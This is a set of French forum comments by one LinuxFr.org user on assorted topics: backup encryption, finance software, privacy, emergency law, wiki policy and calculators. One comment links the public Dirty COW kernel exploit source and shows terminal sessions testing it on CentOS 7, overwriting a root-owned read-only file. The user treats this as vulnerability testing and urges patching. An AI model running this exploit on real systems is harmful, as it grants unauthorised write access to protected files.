Xavier Teyssier a écrit 1230 commentaires

Il me semble avoir lu (on notera à quel point je suis sûr de moi) je ne sais plus où qu'aujourd'hui, les sites accessibles en IPv6 sont favorisés dans le classement de Google.

Note : toute personne pouvant me donner une source fiable à ce sujet sera grandement appréciée :-)

Pas besoin d'attendre : il y a déjà plein d'informations pertinentes, et autant faire connaitre le projet dès ces débuts :-)

attendre que le support Armbian et kernel 4.x avance encore un peu plus
Ça, ça pourra être l'occasion de soumettre une seconde dépêche sur le sujet !

si tu chiffres tes disques externes, je suppose que tu chiffres aussi ton NAS (autrement quelqu'un volant ton NAS aurait accès à toutes les données de toutes tes machines) ? Si oui il y a pas mal de problèmes associés

Perso, je conserve une copie de mes sauvegardes sur un disque dur chiffré que je stocke au boulot. Ce disque est chiffré : il a beau être dans un tiroir avec des affaires personnelles, et étiqueté comme étant un disque personnel, je n'ai aucune assurance qu'il ne sera pas accédé par un tiers. Je dirais même que la probabilité, sans être élevée, est loin d'être négligeable.
En tout cas, bien plus élevée que celle de me faire voler mon NAS chez moi.
Du coup, je chiffre mes sauvegardes externes tout comme mes portables, mais aucunement les médiums qui reste chez moi.

Jusqu'à maintenant.

Le mois dernier, j'ai une collègue qui s'est fait cambriolée. Tout a été volé : le portable et les disques durs externes.
Les données originales comme les sauvegardes ont disparues, et sont potentiellement accessibles par n'importe qui.

J'avoue que je commence à me demander comment réagir face à cela aussi.

Le désaccord n'empêche pas la politesse. Merci de s'abstenir de proférer des insultes.

Heu… Tu utilises Kmymoney et skrooge ?

Pourquoi les deux ? Ne font-ils pas la même chose?

Ceci dit, si tu utilises les deux, je suis intéressé par les avantages et défauts de l'un par rapport à l'autre. En espérant être lu en répondant aussi longtemps après…

Pourtant Chez Moi Ça Marche (TM)

Ce doit être très dépendant des machines.
Dans le doute, mise à jour dès que les correctifs seront publiés (je n'ai pas vérifié si c'est le cas aujourd'hui), en restant dans le cadre de la bonne application des processus d'industrialisation en œuvre sur les machines concernées (je parle bien hein ?), me semblent absolument nécessaire.

Je pense que je ne connaissais pas l'option Z de ls, et que je suis content de maintenant la connaitre ! :-)

J'en pense aussi que je pense que nous n'utilisons peut-être pas les mêmes exploits.

Celui que j'ai testé : https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

Mais je n'avais plus les droits d'écriture sur le fichier.

Ceci dit, si ça lève un doute, je recommence sur un fichier appartenant à root :

[xate@xate-test ~]$ echo "test bis de dirtycow" > /tmp/plop2
[xate@xate-test ~]$ chmod 0404 /tmp/plop2
[xate@xate-test ~]$ sudo chown root:root /tmp/plop2
[xate@xate-test ~]$ cat /tmp/plop2
test bis de dirtycow
[xate@xate-test ~]$ ls -ltrh /tmp/plop2
-r-----r--. 1 root root 21 22 oct.  18:27 /tmp/plop2
[xate@xate-test ~]$ ./dirtyc0w /tmp/plop2 newuser:newpassd0
mmap 7f1f28cfc000
[xate@xate-test ~]$ ls -ltrh
-r-----r--. 1 root root 21 22 oct.  18:27 /tmp/plop2
[xate@xate-test ~]$ cat /tmp/plop2
newuser:newpassd0own
[xate@xate-test ~]$

En tout cas, sur CentOS 7, ça fonctionne :

    [xate@xate-test ~]$ cat /etc/redhat-release 
    CentOS Linux release 7.2.1511 (Core) 
    [xate@xate-test ~]$ uname -a
    Linux xate-test.nfrance.com 3.10.0-327.28.2.el7.x86_64 #1 SMP Wed Aug 3 11:11:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

    [xate@xate-test ~]$ sudo echo 'test de la faille dirtycow' > /tmp/plop
    [xate@xate-test ~]$ chmod 0404  /tmp/plop
    [xate@xate-test ~]$ ls -ltrh /tmp/plop
    -r-----r--. 1 xate xate 27 22 oct.  13:47 /tmp/plop
    [xate@xate-test ~]$ cat /tmp/plop
    test de la faille dirtycow
    [xate@xate-test ~]$ gcc -pthread dirtyc0w.c -o dirtyc0w
    [xate@xate-test ~]$ ./dirtyc0w /tmp/plop m00000000000000000
    mmap 7f661fa2f000

    ^C
    [xate@xate-test ~]$ cat /tmp/plop 
    m00000000000000000dirtycow
    [xate@xate-test ~]$ 

Sur certaines archi, quand la prod est tombé, la première chose à faire, le plus important, le plus urgent, c'est de restaurer le service, coûte que coûte, même si ce doit être réalisé avec une solution crade.
Une fois le service à nouveau rendu, là, on met en place des méthodes propres pour que cette panne ne puisse se reproduire, et pour que si ça se reproduise, on puisse corriger de manière propre…

vu que l'on devient un client du groupe canal (de façon indirecte), quid de nos données personnelles ? Ont-elles été transmises ?

Si tu payes Free pour avoir la TV via ta freebox, tu es déjà un client indirect du groupe canal (Vivendi) puisque tu reçois déjà D8. Pourquoi les données transmises changeraient ?

Si ton disque avait des I/O Error, c'est qu'il est en train de mourir.
Fait un dd sir tu veux, mais même si ça passe, ne met plus sur ce disque de données que tu ne souhaites pas perdre.

Non, non. Cozy, c'est pour un seul et unique utilisateur.

Extrait de la FAQ :
Puis-je créer des comptes pour ma famille et mes amis sur mon instance Cozy ?
Cozy est un cloud personnel, et il ne gère pas plusieurs utilisateurs. Cela nous permet d'assurer la sécurité de vos données et de simplifier considérablement l'administration serveur.

Google, s'il te plait, envoie moi un questionnaire sur mes tendances, mes opinions, mes préférences, les fréquences d'usages, les intérêts politiques et culturels.

C'est par là : https://www.google.com/settings/u/0/ads/authenticated

Après la mise sur écoute sans passer par l'autorité judiciaire, ce sont les perquisitions à domicile de jour, comme de nuit, qui pourront se passer de celle-ci.

Mmmm… pas sûr. Si j'en crois mes lectures, l'état d'urgence ne permet pas de se passer de l'autorité judiciaire. Ce que l'état d'urgence ajoute dans les domaines des perquisitions, c'est la possibilité de mener des perquisitions de nuits.
Sauf qu'en pratique, depuis 1997 (date à vérifier !), les perquisitions de nuits sont autorisées dans le cadre d'enquête liées au terrorisme…

Essayer plein de lecteurs différents. J'ai déjà eu en main des cartes Compact Flash qui n'étaient plus visibles depuis plusieurs lecteurs, et encore accessible sur l'un d'eux. Peut-être un problème de tension ?

J'ai vu passer des questions à propos du Windows 10 de Microsoft gratuit

Ah ben oui, si ce système est gratuit, j'ai une question : où le trouver gratuitement ? N'ayant pas de MS Windows chez moi, ça m’intéresse de me le procurer pour quelques tests si je peux le faire gratuitement.

Si vous êtes sensible au devenir de l'espèce humain […] alors […] vous chercherez à n'utiliser que des logiciels libres.

Ah ouais ! Quand même !

Tout cela reste encore au conditionnel car l'histoire ne dévoile pas encore toute son intrigue. L'annonce complète se fera la semaine prochaine au Blackhat USA 2015 et au DEF CON 23.

Ah oui, Ok.
J'attend de voir l'annonce complète alors.
Il y a eu, ces dernières années, tellement d'annonces de faille du genre "C'est la fin du monde, venez à notre conf, on va tout vous dire", pour finir par un simple pétard mouillé… J'attend donc de voir si on est effectivement face à un truc massif, ou si, une fois la conf passée, on pourra conclure qu'en fait, les conditions nécessaires à une concrète exploitation de la faille limite celle-ci à un échantillon faible et pas si inquiétant de téléphone…

J'en pense que tu sous-estimes largement les capacités d'analyse qui peuvent être mise en œuvre, j'en pense qu'il deviendrait plus difficile de distinguer un mail légitime d'un SPAM, j'en pense que répondre à un mail en ne citant que la partie pertinente risque d'être bien plus compliquée, et enfin, j'en pense que beaucoup de forfait data ne seront vraiment pas fan de ton idée…

Il y a régulièrement des revues de presses sur Linuxfr. Par exemple, ici, celle du mois dernier : https://linuxfr.org/news/revue-de-presse-mai-2015

Quoique pas si régulièrement que cela, faute de main d'œuvre…

N'hésite pas à en lancer une dans l'espace de rédaction collaboratif, par ici : https://linuxfr.org/redaction

Je me contente d'apprécier la dépêche, félicite son auteur, et l'encourage à poster d'autres textes de cet acabit ! :-)

Autant y remettre ce qui y était présent auparavant (il me semble qu'elle existait).
L'utilisation du wiki est a priori d'avoir des liens sur des pages significatives, les formats ouverts faisant partie de l'action.

Ou pas.

Tout dépend de la vision que l'on a de ce wiki. Perso, je ne vois aucun interêt d'en faire un sous-ensemble de Wikipedia. C'est même AMHA contre-productif. Parler des format ouvert, ce peut-être l'objet d'une dépêche, où, si on souhaite une page mise à jour régulièrement, l'objet d'une page sur Wikipedia. Mais je ne vois aucun intérêt d'une page parlant de cela sur le wiki de Linuxfr.org, page qui sera par essence moins complète que sur Wikipedia.

À mes yeux, le wiki de Linuxfr ne devrait contenir que du contenu dédié à Linuxfr (template de news, manuel d'utilisation du site, etc.).

Je n'adhère pas non plus à l'argument des liens internes pour améliorer le référencement. Si les liens sont pertinent, l'amélioration du référencement sera un effet collatéral, sinon, inutile de créer le lien. Le référencement, on l'améliore avec la qualité et la quantité de nos dépêches :-)

Je ne suis pas assez impliqué dans Crunchbang pour écrire un article complet sur le sujet, parler de la distribution, de la communauté et des avenirs possibles.

Alors j'essaie juste d'attirer un regard sur ce qui se passe, en espérant attirer des commentaires comme les tiens permettant d'avoir plus d'infos, voire de susciter l'envie de créer un dépêche plus complète sur l'un des sujets abordés :)

bon pour le chargement je ne crois pas au succès du sans fil

Et pourtant, une bonne boucle à induction dans le plafond, et pouf, tous les périphériques qui passeraint dans ladite pièce qui se rechargerait d'office. Ne serait-ce pas génial ?

j'en profite donc pour réagir sur la réaction et pour remercier chaleureusement encore mon HP-48 (les TI c'est nul! Hop une bataille de l'époque)

Et là, je percute que ce débat HP vs TI a probablement été le premier troll auquel j'ai activement participé :)

Je me souviens d'ailleurs que dans son manuel, HP parlait bien de calculateur, et non de calculatrice. Et si ça, ce n'est pas la classe ;-)